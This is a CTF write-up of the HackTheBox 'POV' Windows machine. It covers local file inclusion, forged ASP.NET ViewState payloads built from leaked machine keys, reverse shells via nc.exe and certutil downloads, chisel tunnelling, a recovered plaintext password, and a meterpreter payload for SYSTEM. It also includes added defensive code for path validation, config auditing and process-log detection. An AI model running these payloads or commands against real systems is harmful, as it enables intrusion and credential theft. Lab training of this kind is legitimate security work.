HackTheBox | POV

In this walkthrough, I demonstrate how I obtained complete ownership of POV on HackTheBox.
In: HackTheBox, Attack, CTF, Windows, Medium Challenge

Nmap Results

# Nmap 7.94SVN scan initiated Tue Jan 30 16:24:53 2024 as: nmap -Pn -p- -sT --min-rate 5000 -A -oN nmap.txt 10.10.11.251
Nmap scan report for 10.10.11.251
Host is up (0.014s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-title: pov.htb
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using proto 1/icmp)
HOP RTT      ADDRESS
1   13.98 ms 10.10.14.1
2   14.12 ms 10.10.11.251

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 30 16:25:35 2024 -- 1 IP address (1 host up) scanned in 42.09 seconds





Service Enumeration

TCP/80

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-title: pov.htb

We can see that the default page on the target web server has a title of pov.htb. Let's add that to our /etc/hosts file.

echo '10.10.11.251        pov.htb' | sudo tee -a /etc/hosts

Gobuster Enumeration

Directories and Files

gobuster dir -u http://pov.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php,txt -o gobuster-80.txt -t 100
/Index.html           (Status: 200) [Size: 12330]
/css                  (Status: 301) [Size: 142] [--> http://pov.htb/css/]
/img                  (Status: 301) [Size: 142] [--> http://pov.htb/img/]
/index.html           (Status: 200) [Size: 12330]
/js                   (Status: 301) [Size: 141] [--> http://pov.htb/js/]

Virtual Hosts

# --exclude-length 334 : silence HTTP 400
gobuster vhost -k --domain pov.htb --append-domain -u http://10.10.11.251 -w /usr/share/dnsrecon/subdomains-top1mil.txt -t 100 -o vhost.txt --exclude-length 334
Found: dev.pov.htb Status: 302 [Size: 152] [--> http://dev.pov.htb/portfolio/]



dev.pov.htb

echo '10.10.11.251        dev.pov.htb' | sudo tee -a /etc/hosts

Add this hostname to our hosts file

On the contact.aspx page, there appears to be a form that makes an HTTP POST request to itself. Not sure if this is exploitable yet.

More Directory and File Enumeration

# Ignore 302,404 responses
gobuster dir -u http://dev.pov.htb/portfolio -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php,txt -o gobuster-80-dev.txt -t 100 -b 302,404
/Contact.aspx         (Status: 200) [Size: 4691]
/Default.aspx         (Status: 200) [Size: 21371]
/assets               (Status: 301) [Size: 159] [--> http://dev.pov.htb/portfolio/assets/]
/contact.aspx         (Status: 200) [Size: 4691]
/default.aspx         (Status: 200) [Size: 21371]

If we try to navigate to http://dev.pov.htb/portfolio/assets, we can see that the web server redirects us to http://dev.pov.htb:8080.



Testing the Download Function

Clicking the Download CV button invokes a __doPostBack JavaScript event of download and uses the file name cv.pdf by default.

I got really lucky with my guess that the cv.pdf file is stored at the root of the directory.

💡
Effectively, the Download CV button is just pulling the cv.pdf file from this directory. Looking at my Burp request history, I notice there are other files we can test with in the /portfolio/ directory. It should be possible to download files by simply modifying the file= parameter in the POST request.

Let's see if we can download any of the above files from the server. The procedure will go like this:

  1. Turn on Burp intercept
  2. Click the Download CV button
  3. Change the cv.pdf filename to default.aspx
  4. Check and see if we got the page source code
Intercept on
Before
After (changed to default.aspx)
Click 'Forward'
Looking good! Click the 'Keep' button!
We have downloaded the server-side source code!



Additional Download Tests

This is the last request for the file download I just sent in Burp. Right-click the request and choose Send to Repeater.

Original request loaded into 'Repeater'

In the source code we downloaded above, we noted the CodeFile=index.aspx.cs attribute, which points to the code-behind file that runs server-side for the default.aspx page. Let's take a look at that file. In Repeater, change &file=default.aspx to &file=index.aspx.cs and click Run.

Nice! We are able to read the C# code that runs server side when we load the page initially or interact with the Download event listener. There appears to be a bit of user input sanitization on the file= parameter as well, which wasn't a problem for us, as we used backslashes.

Let's take a look at contact.aspx and do the same thing. Load the page source, then load the server-side source.

Excellent! We can see the server-side code that will run when we load the page or submit information in the contact form.

Absolute paths also worked flawlessly, without any special tricks: &file=C:\Windows\System32\drivers\etc\hosts.

Relative paths worked as well, which is how I found the config file for the dev.pov.htb host: &file=..\web.config.

I even found that I can capture the sfitz user's NetNTLMv2 hash by using impacket-smbserver and specifying &file=\\kali_vpn_ip\share_name\file_name.

Unfortunately, it didn't crack with JTR.

I also tried creating reverse .aspx and web.config shells but had no luck getting a reverse shell when specifying &file=\\10.10.14.15\evil\file_name, even with other TCP ports specified.
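As an added defensive illustration, not code from the original post, here is how the file= handler behind Download CV could validate its input so that each of the values tried above (backslash traversal, an absolute path, a UNC path, and a source file inside the web root) is refused. The web root path and the probe list are constructed for the example.

```python
import ntpath

# Assumed web root for the dev vhost; a placeholder, not a path from the box.
WEB_ROOT = r"C:\inetpub\dev\portfolio"
ALLOWED_EXTENSIONS = {".pdf"}   # the Download CV feature only ever needs PDFs

def naive_sanitize(name):
    """The style of filter the walkthrough bypassed: it only strips "../",
    so "..\\", drive-absolute paths and UNC paths sail straight through."""
    return name.replace("../", "")

def is_safe_download(name, root=WEB_ROOT):
    """True only if `name` is a PDF that resolves strictly inside `root`.

    ntpath is used so the check behaves like the Windows server even when
    this script is run on Linux."""
    if not name or "\x00" in name:
        return False
    # Refuse UNC paths (\\host\share, which also leak NetNTLMv2 to a
    # remote SMB server) and anything carrying a drive letter.
    if name.startswith(("\\\\", "//")) or ntpath.splitdrive(name)[0]:
        return False
    # Treat forward slashes like backslashes, then collapse ".." components.
    candidate = ntpath.normpath(ntpath.join(root, name.replace("/", "\\")))
    root_norm = ntpath.normpath(root).lower()
    if not candidate.lower().startswith(root_norm + "\\"):
        return False   # escaped the web root (e.g. ..\web.config)
    # Allowlist the extension so default.aspx / index.aspx.cs cannot be served.
    return ntpath.splitext(candidate)[1].lower() in ALLOWED_EXTENSIONS

# Values the walkthrough sent in the file= parameter, plus the legitimate one.
PROBES = [
    "cv.pdf",
    "default.aspx",
    "index.aspx.cs",
    "..\\web.config",
    "C:\\Windows\\System32\\drivers\\etc\\hosts",
    "\\\\10.10.14.15\\share\\file",
]

def check_all(probes=PROBES):
    """Return {probe: allowed?} so the result can be inspected or asserted on."""
    return {p: is_safe_download(p) for p in probes}

if __name__ == "__main__":
    for probe, ok in check_all().items():
        print(f"{'ALLOW' if ok else 'DENY ':5} {probe}")
```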



Exploit

VIEWSTATE Deserialization with Secrets

I prodded the file system as much as I could with the LFI vulnerability, but came to a dead end. As any good security researcher would do, I took the information I'd gathered until now and searched Google for potential exploits, such as:

  • Response.TransmitFile() exploitability
  • Response.AppendHeader() exploitability

However, it was this search that ultimately opened the door to code execution:

web.config aes machine key exploit - Google Search
Exploiting __VIEWSTATE knowing the secrets - HackTricks

The HackTricks page advises us to use the ysoserial.exe binary to generate a serialized VIEWSTATE payload that the server will deserialize. In this case, we know the encryption secrets, as we have access to the web.config file.

Releases · pwntester/ysoserial.net
Deserialization payload generator for a variety of .NET formatters - pwntester/ysoserial.net
💡
You can download the ysoserial tool to a Windows VM, your Windows host, or run it using Wine on Kali. I'm going to do it the Wine way, cause I like pain.
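An added example, not from the post or from HackTricks, that audits a web.config for the conditions that make this attack possible: static machineKey values that a file-read bug can leak, a weak validation algorithm, and ViewState MAC switched off. The config below is constructed and its key values are placeholders, not the box's keys.

```python
import xml.etree.ElementTree as ET

# Constructed web.config fragment modelled on the settings the walkthrough
# pulled from the box (AES decryption, SHA1 validation, static keys).
# The key values are placeholders, not real keys.
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="PLACEHOLDER_VALIDATION_KEY"
                decryptionKey="PLACEHOLDER_DECRYPTION_KEY"
                validation="SHA1" decryption="AES" />
    <pages enableViewStateMac="true" viewStateEncryptionMode="Auto" />
  </system.web>
</configuration>
"""

# Same app with keys left to auto-generate and an HMAC-SHA256 MAC.
HARDENED_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validation="HMACSHA256" decryption="AES" />
    <pages enableViewStateMac="true" />
  </system.web>
</configuration>
"""

STRONG_VALIDATION = {"HMACSHA256", "HMACSHA384", "HMACSHA512"}

def audit_machine_key(config_xml):
    """Return a list of findings for the <machineKey>/<pages> settings."""
    findings = []
    root = ET.fromstring(config_xml)
    mk = root.find("./system.web/machineKey")
    pages = root.find("./system.web/pages")

    # Newer frameworks ignore this attribute, but it is still worth flagging.
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append("CRITICAL: enableViewStateMac=false; unsigned ViewState is deserialized")

    if mk is None:
        return findings  # keys auto-generated per app pool; nothing static to leak

    for attr in ("validationKey", "decryptionKey"):
        value = mk.get(attr, "AutoGenerate,IsolateApps")
        if not value.startswith("AutoGenerate"):
            findings.append(f"HIGH: static {attr} in web.config; a file-read bug leaks it "
                            f"and lets anyone forge ViewState (rotate the key)")

    validation = mk.get("validation", "HMACSHA256").upper()
    if validation not in STRONG_VALIDATION:
        findings.append(f"MEDIUM: validation={validation}; use HMACSHA256 or stronger")
    return findings

if __name__ == "__main__":
    for f in audit_machine_key(SAMPLE_WEB_CONFIG):
        print(f)
```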



Installing Wine Dependencies

🛑
I urge you to consider taking a snapshot of your Kali instance at its current state before installing Wine. That way you can easily roll it back in case anything goes wrong with the install or you're unhappy with the performance.
sudo dpkg --add-architecture i386
sudo apt update
sudo apt install -y wine wine32:i386 winetricks mono-complete

Installing Wine-Mono

First, check the installed version of wine by running wine --version. In the screenshot below, you'll see I have version 8.0.1.

Next, we should consult the wine-mono version table here:

Mono - WineHQ Wiki

My version is not 8.9, but it is greater than 7.20, so according to the table we should install wine-mono version 7.4.0.

wget https://dl.winehq.org/wine/wine-mono/7.4.0/wine-mono-7.4.0-x86.msi
wine uninstaller
💡
If you get error wine: could not load kernel32.dll, status c0000135, just run rm -rf ~/.wine/. Then, re-run wine uninstaller.
Click 'Install'
Double-click the downloaded '.msi' file then click 'OK'



Install .NET Libraries

winetricks dotnet48
Proceed through the installation



Generating the Serialized Payload

wget https://github.com/pwntester/ysoserial.net/releases/download/v1.36/ysoserial-1dba9c4416ba6e79b6b262b758fa75e2ee9008e9.zip -O ysoserial.zip
unzip -d ysoserial ysoserial.zip
cd ysoserial/Release

We'll be referencing the example command here to generate the payload.

# LD_PRELOAD= : clear the variable at runtime to silence some errors on my host
# 2>/dev/null : Wine writes warnings to stderr that would otherwise get mixed into the payload
# tr -d '\r\n' : strip any line breaks Wine may add to the output (sed 's/\n//g' cannot do this, as sed never sees a newline inside a line)

LD_PRELOAD= wine ./ysoserial.exe -p ViewState -g TextFormattingRunProperties \
-c "ping 10.10.14.15" \
--path="/portfolio/default.aspx" --apppath="/" \
--decryptionalg="AES" \
--decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" \
--validationalg="SHA1" \
--validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" 2>/dev/null | tr -d '\r\n'



Weaponizing the Payload

In Burp, go to the Proxy tab and turn Intercept on.

Click the Download CV button.

Note the request is intercepted and held by Burp. Highlight the VIEWSTATE parameter all the way up until the first & (ampersand).

Overwrite the contents of the VIEWSTATE parameter with the payload you generated. Recall that the command I used in the example is ping 10.10.14.15, so I'm going to attempt to have the target ping my Kali VPN IP.

Go back into Burp and press the Forward button.

Note that I used tcpdump to listen for ICMP traffic on my tun0 interface and you can see the incoming ICMP echo request packets from 10.10.11.251 (the target's IP address).



Getting a Reverse Shell

Transfer nc.exe to the Target

cp /usr/share/windows-resources/binaries/nc.exe .
sudo python3 -m http.server 80

Copy 'nc.exe' to the current directory and host it over HTTP

LD_PRELOAD= wine ./ysoserial.exe -p ViewState -g TextFormattingRunProperties \
-c "certutil.exe -urlcache -split -f http://10.10.14.15/nc.exe C:\Windows\Temp\nc.exe" \
--path="/portfolio/default.aspx" --apppath="/" \
--decryptionalg="AES" \
--decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" \
--validationalg="SHA1" \
--validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" 2>/dev/null | tr -d '\r\n'

Generate the VIEWSTATE payload

You can see the target successfully pulled the file



Trigger a Reverse Shell

sudo rlwrap nc -lnvp 443

Start a listener on your chosen TCP port

LD_PRELOAD= wine ./ysoserial.exe -p ViewState -g TextFormattingRunProperties \
-c "C:\Windows\Temp\nc.exe 10.10.14.15 443 -e powershell.exe" \
--path="/portfolio/default.aspx" --apppath="/" \
--decryptionalg="AES" \
--decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" \
--validationalg="SHA1" \
--validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" 2>/dev/null | tr -d '\r\n'

Generate the VIEWSTATE payload
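As an added example (not part of the original walkthrough), here is the process-creation trail this chain leaves on the host, with triage logic a defender could run over Sysmon Event ID 1 data: the IIS worker process w3wp.exe spawning cmd.exe, certutil fetching nc.exe into C:\Windows\Temp, and nc.exe starting with -e powershell.exe. The events are constructed in Sysmon style; the PIDs are illustrative.

```python
import ntpath

# Constructed Sysmon-style process-creation events (EID 1).  PIDs are
# illustrative; images, commands and the pov\sfitz context follow the post.
EVENTS = [
    {"pid": 4120, "ppid": 3988, "user": "pov\\sfitz",
     "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c "ping 10.10.14.15"'},
    {"pid": 4188, "ppid": 4120, "user": "pov\\sfitz",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://10.10.14.15/nc.exe C:\Windows\Temp\nc.exe"},
    {"pid": 4212, "ppid": 4120, "user": "pov\\sfitz",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\Temp\nc.exe",
     "cmdline": r"C:\Windows\Temp\nc.exe 10.10.14.15 443 -e powershell.exe"},
    {"pid": 5001, "ppid": 812, "user": "NT AUTHORITY\\SYSTEM",   # benign control
     "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

IIS_WORKER = "w3wp.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

def base(path):
    return ntpath.basename(path).lower()

def classify(ev):
    """Rule names matched by a single event."""
    hits, cmd, img = [], ev["cmdline"].lower(), base(ev["image"])
    if base(ev["parent"]) == IIS_WORKER and img in SHELLS:
        hits.append("iis_worker_spawned_shell")      # where ViewState RCE lands
    if img == "certutil.exe" and "-urlcache" in cmd:
        hits.append("certutil_download")             # LOLBin fetch of nc.exe
    if img == "nc.exe" or (" -e " in cmd and any(s in cmd for s in SHELLS)):
        hits.append("netcat_reverse_shell")
    if ev["image"].lower().startswith(r"c:\windows\temp" + "\\"):
        hits.append("exec_from_windows_temp")        # writable drop directory
    return hits

def iis_descendants(events):
    """PIDs whose ancestry (within the sample) leads back to w3wp.exe.
    Catches ping/certutil/nc even when their direct parent is only cmd.exe."""
    ppid_of = {ev["pid"]: ev["ppid"] for ev in events}
    parent_img = {ev["pid"]: base(ev["parent"]) for ev in events}
    found = set()
    for ev in events:
        pid = ev["pid"]
        while pid in ppid_of:
            if parent_img[pid] == IIS_WORKER:
                found.add(ev["pid"])
                break
            pid = ppid_of[pid]
    return found

def triage(events=EVENTS):
    """{pid: [rules]} for every event that matched at least one rule."""
    return {ev["pid"]: classify(ev) for ev in events if classify(ev)}

if __name__ == "__main__":
    for pid, rules in triage().items():
        print(pid, rules)
    print("descended from IIS worker:", sorted(iis_descendants(EVENTS)))
```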





Post-Exploit Enumeration

Operating Environment

OS & Kernel

Host Name:                 POV
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-00521-62775-AA076
Original Install Date:     10/26/2023, 1:01:55 PM
System Boot Time:          2/2/2024, 6:46:50 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 3,296 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 4,029 MB
Virtual Memory: In Use:    770 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.11.251
                                 [02]: fe80::4666:410:2b2c:7069
                                 [03]: dead:beef::4d88:e9c:6f0c:4b61
                                 [04]: dead:beef::a9
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.    

Current User

USER INFORMATION
----------------

User Name SID                                          
========= =============================================
pov\sfitz S-1-5-21-2506154456-4081221362-271687478-1000


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                           Attributes                                        
====================================== ================ ============================================================= ==================================================
Everyone                               Well-known group S-1-1-0                                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                     Well-known group S-1-5-3                                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113                                                     Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                      Alias            S-1-5-32-568                                                  Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0                                                       Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\dev                        Well-known group S-1-5-82-781516728-2844361489-696272565-2378874797-2530480757 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10                                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192                                                                                                     


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled    



Users and Groups

Local Users

User accounts for \\POV

-------------------------------------------------------------------------------
Administrator            alaading                 DefaultAccount           
Guest                    sfitz                    WDAGUtilityAccount       
The command completed successfully.    

Local Groups

*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Storage Replica Administrators
*System Managed Accounts Group
*Users    



Network Configurations

Network Interfaces

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::a9
   IPv6 Address. . . . . . . . . . . : dead:beef::4d88:e9c:6f0c:4b61
   Link-local IPv6 Address . . . . . : fe80::4666:410:2b2c:7069%4
   IPv4 Address. . . . . . . . . . . : 10.10.11.251
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:89e0%4
                                       10.10.10.2    

Open Ports

localaddress localport
------------ ---------
::               49668
::               49667
::               49666
::               49665
::               49664
::               47001
::                5985
::                 445
::                 135
::                  80
0.0.0.0          49668
0.0.0.0          49667
0.0.0.0          49666
0.0.0.0          49665
0.0.0.0          49664
10.10.11.251       139
0.0.0.0            135    



Interesting Files

C:\Users\sfitz\Documents\connection.xml

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">alaading</S>
      <SS N="Password">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</SS>
    </Props>
  </Obj>
</Objs>





Privilege Escalation

Lateral to Alaading

In the post-exploit enumeration section, we came across the C:\Users\sfitz\Documents\connection.xml file which, on inspection, is a PowerShell PSCredential object exported in CliXml format.

I'm already running a PowerShell reverse shell, so I should be able to import the credential object and reveal the plaintext password with ease.

$cred = Import-Clixml C:\Users\sfitz\Documents\connection.xml
$cred.GetNetworkCredential().Username
$cred.GetNetworkCredential().Password
alaading : f8gQ8fynP44ek1m3

You may also have noticed in the post-exploit enumeration that tcp/5985 is open in the listening ports. It is clearly blocked by the Windows firewall, since it did not show up in our initial nmap scan. We can use chisel to forward this port.

wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_windows_amd64.gz -O chisel.exe.gz
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz -O chisel.gz
gunzip chisel.exe.gz
gunzip chisel.gz
chmod u+x chisel
sudo python3 -m http.server 80

Download the binaries and host over HTTP

cd C:\Windows\Temp
iwr http://10.10.14.15/chisel.exe -o chisel.exe

Download to the target

sudo ./chisel server --port 8081 --reverse &

Start chisel in server mode on Kali

$scriptBlock = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('client','10.10.14.15:8081','R:5985:127.0.0.1:5985') }
Start-Job -ScriptBlock $scriptBlock

Start chisel in client mode as a background job on the target

evil-winrm -i 127.0.0.1 -u 'alaading' -p 'f8gQ8fynP44ek1m3'

Connect to the target through the chisel tunnel

💡
Now that we've established our shell as alaading, we repeat the post-exploit enumeration process.



Alternative Lateral to Alaading

Release RunasCs version 1.5 · antonioCoco/RunasCs: https://github.com/antonioCoco/RunasCs/releases
Spawn Processes as Oth... | 0xBEN | Notes
  1. Transfer RunasCs.exe to the target
  2. Start a TCP listener
  3. Run the command to connect to the TCP listener with alaading credentials
sudo rlwrap nc -lvnp 443

Start the listener

.\RunasCs.exe 'alaading' 'f8gQ8fynP44ek1m3' 'powershell.exe' -r 10.10.14.15:443

Spawn the process and redirect to the listener



Escalate to Administrator

ℹ️
I gave it my best effort to use the SeDebugPrivilege given to this user account to achieve NT AUTHORITY\SYSTEM or Administrator without meterpreter. I was able to dump lsass using procdump, but the Administrator didn't have a cached session. Other techniques were also fruitless.

Metasploit

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.15 LPORT=443 -f exe -o sh.exe

Create the meterpreter payload

sudo msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > set LPORT 443
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run

Start msfconsole and configure the multi/handler

sudo python3 -m http.server 80

Serve the meterpreter payload over HTTP

iwr http://10.10.14.15/sh.exe -o sh.exe
.\sh.exe

Download and run the file

meterpreter > migrate -N lsass.exe
Running as SYSTEM!



Flags

User

6554d872ca302f4e5c7c31ac06f8f638    

Root

8f5b63e0cff832f141a776127bb09758    